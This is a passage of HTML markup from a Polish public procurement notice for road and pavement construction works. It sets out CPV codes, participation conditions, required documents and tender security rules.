specyfikacją techniczną wykonania i odbioru robótbudowlanych, wiedzą techniczną, sztuką budowlaną i obowiązującymi przepisami.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45342000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262300-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233120-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233140-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233220-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34922100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316213-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzieleniezamówień, o których mowa w art. 67 ust. 1 pkt 6 Pzp, w wysokości nie większej niż 50% wartościzamówienia podstawowego i polegających na powtórzeniu podobnych robót budowlanych zgodnych zprzedmiotem zamówienia. Na okoliczność wystąpienia przedmiotowych zamówień zostanie zawartaumowa w trybie zamówienia z wolnej ręki poprzedzona stosownymi negocjacjami z Wykonawcą.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">70</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający wymaga wpisu do właściwego rejestru zawodowego lubhandlowego zgodnie z wymogami określonymi w SIWZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">1. Wykonawca spełni warunek, jeżeli wykaże, że: 1) posiada średni roczny obrót za ostatnie 3 lata obrotowe w wysokości nie mniejszej niż 1 000 000,00 zł za a jeżeli okres prowadzenia działalności jest krótszy, za ten okres 2) posiada środki finansowe lub zdolność kredytową do wykonania zamówienia w wysokości nie mniejszej niż 200 000,00 zł 3) posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości nie mniejszej niż 200 000,00 zł</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe">1. Wykonawca może w celu potwierdzenia spełniania warunków udziału wpostępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jegoczęści, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lubekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych. 2. Zamawiający jednocześnie informuje, iż ,,stosowna sytuacja", o którejmowa w pkt 10.5 SIWZ wystąpi wyłącznie w przypadku kiedy: 1) Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizujączamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobówna potrzeby realizacji zamówienia. 2) Zamawiający oceni, czy udostępniane wykonawcy przez innepodmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu orazzbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24ust. 1 pkt 13-22 Pzp oraz, o których mowa w pkt 11.1. SIWZ. 3) W odniesieniu do warunkówdotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogąpolegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lubusługi, do realizacji których te zdolności są wymagane. 3. Wykonawca, który polega na sytuacjifinansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, któryzobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałąwskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 4.Zamawiający informuje, iż szczegółowe wymagania odnośnie niniejszych warunków zawarte są wspecyfikacji istotnych warunków zamówienia zamieszczonej na stronie internetowejZamawiającego.</span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. Wykonawca spełni warunek, jeżeli wykaże, że: 1) wykonał zgodnie zzasadami prawa budowlanego i prawidłowo ukończył w okresie ostatnich 5 lat przed upływemterminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie conajmniej dwa zamówienia (realizowane w ramach dwóch odrębnych umów), polegające nabudowie nawierzchni utwardzonych np. drogi, chodniki, parkingi i wartości każdego z zamówieńco najmniej 300 000,00 zł brutto, 2) dysponuje osobami zdolnymi do wykonania zamówienia -wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby wraz zinformacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia,niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynność, orazinformacją o podstawie do dysponowania tymi osobami tj. kierownik budowy branży drogowej -ma posiadać uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalnościdrogowej lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniejobowiązujących przepisów, a które upoważniają do pełnienia tych funkcji. 2. W przypadkuWykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający dokonując ocenyspełnienia warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej (októrym mowa w pkt 10.1.2) b) lit. a. SIWZ), uzna warunek za spełniony, jeżeli co najmniej jeden zWykonawców samodzielnie wykaże spełnienie w całości tego warunku. Zamawiający tym samymnie dopuszcza sumowania (łączenia) zasobów dotyczących zdolności technicznej lub zawodowej, októrych mowa w pkt 10.1.2) b) lit. a. SIWZ przez 2 lub więcej podmiotów (Wykonawców). Wprzypadku, gdy Wykonawca w celu spełnienia warunku udziału w postępowaniu, dotyczącegozdolności technicznej lub zawodowej (o którym mowa w pkt 10. 1. 2) b) lit. a. SIWZ) polega nazasobach podmiotu trzeciego na zasadach określonych w ustawie, Zamawiający dokonując ocenyspełnienia tego warunku, uzna warunek za spełniony, jeżeli co najmniej jeden z tych podmiotówsamodzielnie wykaże spełnienie w całości tego warunku. Zamawiający tym samym nie dopuszczasumowania (łączenia) zasobów dotyczących zdolności technicznej lub zawodowej (o których mowaw pkt 10.1.2).b) lit. a. SIWZ) przez 2 lub więcej podmiotów. 3. W przypadku, gdy Wykonawcawykazując spełnienie warunku udziału w postępowaniu dotyczącego zdolności technicznej lubzawodowej (o którym mowa w pkt 10.1.2).b) lit. a. SIWZ), polegał będzie na doświadczeniuinnych podmiotów, jedynym sposobem wykorzystania zasobów tych podmiotów (tj. zdolnośćtechniczna lub zawodowa o której mowa w pkt 10.1.2).b) lit. a. SIWZ) jest rzeczywisty udział tychpodmiotów w realizacji zamówienia np. zatrudnienie tych podmiotów do realizacji zamówieniajako podwykonawców lub udział w konsorcjum.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. Wykonawca może w celu potwierdzenia spełniania warunków udziału wpostępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jegoczęści, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lubekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych. 2. Zamawiający jednocześnie informuje, iż ,,stosowna sytuacja", o którejmowa w pkt 10.5 SIWZ wystąpi wyłącznie w przypadku kiedy: 1) Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizujączamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobówna potrzeby realizacji zamówienia. 2) Zamawiający oceni, czy udostępniane wykonawcy przez innepodmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu orazzbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24ust. 1 pkt 13-22 Pzp oraz, o których mowa w pkt 11.1. SIWZ. 3) W odniesieniu do warunkówdotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogąpolegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lubusługi, do realizacji których te zdolności są wymagane. 3. Zamawiający informuje, iż szczegółowewymagania odnośnie niniejszych warunków zawarte są w specyfikacji istotnych warunkówzamówienia zamieszczonej na stronie internetowej Zamawiającego.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21Pzp wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. b)Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca niezalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminuskładania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie zwłaściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkamilub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lubrozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwegoorganu. c) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu UbezpieczeńSpołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentupotwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lubzdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lubinny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu. d) Odpis z właściwego rejestru lub zcentralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagająwpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust. 5 pkt 1 Pzp. e) Oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środkazapobiegawczego zakazu ubiegania się o zamówienia publiczne (wg wzoru stanowiącego Załączniknr 5 do SIWZ). f) Oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłatlokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych(Dz. U. z 2018 r. poz. 1445 ze zm.) - wg wzoru stanowiącego Załącznik nr 6 do SIWZ. g)Oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lubostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek naubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji -dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymiodsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności(wg wzoru stanowiącego Załącznik nr 7 do SIWZ).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a) Wykaz robót budowlanych (wg wzoru stanowiącego Załącznik nr 8 do SIWZ) wykonanych niewcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniemdowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególnościinformacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego iprawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumentywystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli zuzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tychdokumentów - inne dokumenty. Jeżeli wykaz lub inne złożone przez Wykonawcę dokumentybudzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do właściwego podmiotu, narzecz którego roboty budowlane były wykonane, a w przypadku świadczeń okresowych lubciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie. b) Wykaz osób(wg wzoru stanowiącego Załącznik nr 9 do SIWZ) skierowanych przez Wykonawcę do realizacjizamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolęjakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacjizawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówieniapublicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dodysponowania tymi osobami. c) Część sprawozdania finansowego w postaci rachunku zysków istrat, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami prawa kraju, wktórym Wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przezbiegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiednio z opinią obadanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych dosporządzenia sprawozdania finansowego, innych dokumentów określających obroty - za okres niedłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za tenokres - co najmniej w wymaganej wysokości. d) Informacja banku lub spółdzielczej kasyoszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lubzdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływemterminu składania ofert - co najmniej w wymaganej wysokości. e) Dokument potwierdzający, żeWykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalnościzwiązanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Do oferty (Formularz stanowiący Załącznik nr 1 do SIWZ) każdy Wykonawca dołącza aktualnena dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku nr 2 do SIWZ.Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca niepodlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 2. Wykonawca, którypowołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstawwykluczenia oraz spełnienia, w zakresie, w jakim powołuje się na ich zasoby warunków udziału wpostępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt12.1.1) SIWZ. 3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawcówoświadczenie, o którym mowa w pkt 12.1.1) SIWZ składa każdy z Wykonawców wspólnieubiegających się o zamówienie. Oświadczenie ma potwierdzać spełnianie warunków udziału wpostępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawcówwykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.4.Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta zostałanajwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych nadzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art.25 ust. 1 Pzp. 5. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 1) nie podlegająwykluczeniu w przypadkach wskazanych w art. 24 ust. 1 pkt 13-23 Pzp oraz w przypadkachwskazanych w art. 24 ust. 5 pkt 1 i 8 Pzp. 2)spełniają warunki udziału w postępowaniu dotyczące:a) Sytuacji ekonomicznej i finansowej b) zdolności technicznej lub zawodowej 6. Zamawiającyżąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadachokreślonych w art. 22a Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów ioświadczeń wskazanych w pkt 12.2.2) SIWZ potwierdzających brak podstaw wykluczenia orazodpowiednich dokumentów wskazanych w pkt 12.2.1) SIWZ potwierdzających spełnianie, wzakresie, w jakim powołuje się Wykonawca na ich zasoby, warunków udziału w postępowaniu. 7.Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiejskładają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy Prawozamówień publicznych w sprawie rodzajów dokumentów, jakich może żądać Zamawiający odWykonawcy w postępowaniu o udzielenie zamówienia (Rozporządzenie Ministra Rozwoju z dnia26 lipca 2016 roku Dz. U. z 2016 r., poz. 1126 ze zm.). 8. Wykonawcy wspólnie ubiegający się oudzielenie niniejszego zamówienia mogą łącznie spełniać warunki udziału w postępowaniu orazzłożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi wSIWZ, z zastrzeżeniem pkt 10.2 SIWZ (dotyczy warunku zdolności technicznej lub zawodowej, októrym mowa w pkt 10.1.2).b) lit. a. SIWZ). Dokumenty wymienione w pkt 12.2.2) SIWZ składakażdy z Wykonawców wspólnie ubiegających się o zamówienie. Ponadto tacy Wykonawcyustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu alboreprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzieleniezamówienia. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Wysokość wadium. 1) Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium wwysokości 10 000,00 zł [słownie: dziesięć tysięcy złotych] 2. Forma wadium. 1) Wadium może byćwniesione w następujących formach: a) Pieniądzu; b) poręczeniach bankowych lub poręczeniachspółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniempieniężnym; c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych; e) poręczeniachudzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2018 r., poz.110 ze zm.). 2) W przypadku składania przez Wykonawcę wadium w formie gwarancji /poręczenia, gwarancja / poręczenie powinna być sporządzona zgodnie z obowiązującym prawem iwinna zawierać następujące elementy: a) nazwę dającego zlecenie (Wykonawcy), beneficjentagwarancji / poręczenia (Zamawiającego), gwaranta / poręczyciela (banku lub instytucjiubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, b) określeniewierzytelności, która ma być zabezpieczona gwarancją / poręczeniem, c) kwotę gwarancji /poręczenia, d) termin ważności gwarancji / poręczenia, e) bezwarunkowe zobowiązanie gwaranta /poręczyciela do: ,,zapłacenia kwoty gwarancji / poręczenia na pierwsze pisemne żądanieZamawiającego zawierające oświadczenie, iż Wykonawca, którego oferta została wybrana: a.odmówił podpisania umowy na warunkach określonych w ofercie, lub b. nie wniósł zabezpieczenianależytego wykonania umowy, lub c. zawarcie umowy stało się niemożliwe z przyczyn leżących postronie Wykonawcy, lub d. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 i 3a, Pzp z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentówpotwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp, oświadczenia, o którym mowaw art. 25a ust. 1 Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowaw art. 87 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przezWykonawcę jako najkorzystniejszej. 3. Miejsce i sposób wniesienia wadium. 1) Wadium wnoszonew pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:Warszawski Bank Spółdzielczy 77 8015 0004 0314 8744 2030 0106 2) Wadium wnoszone winnych dopuszczonych przez Zamawiającego formach należy złożyć w formie oryginału wsiedzibie Zamawiającego w pok. nr 14 (sekretariat). Nie należy załączać oryginału dokumentuwadialnego do oferty. 4. Termin wniesienia wadium. Wadium należy wnieść przed upływemterminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewubankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy znajdzie się na rachunkuZamawiającego przed upływem terminu składania ofert. 5. Zwrot wadium. Zamawiający zwróciniezwłocznie wadium według zasad określonych w art. 46 Pzp. 6. Utrata wadium. 1) Zamawiającyzatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którymmowa w art. 26 ust. 3 i 3a Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lubdokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp, oświadczenia, októrym mowa w art. 25a ust. 1 Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, októrej mowa w art. 87 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonejprzez Wykonawcę jako najkorzystniejszej. 2) Zamawiający zatrzymuje wadium wraz z odsetkami,jeżeli Wykonawca, którego oferta została wybrana: a) odmówił podpisania umowy w sprawiezamówienia publicznego na warunkach określonych w ofercie; b) nie wniósł wymaganegozabezpieczenia należytego wykonania umowy; c) zawarcie umowy w sprawie zamówieniapublicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span 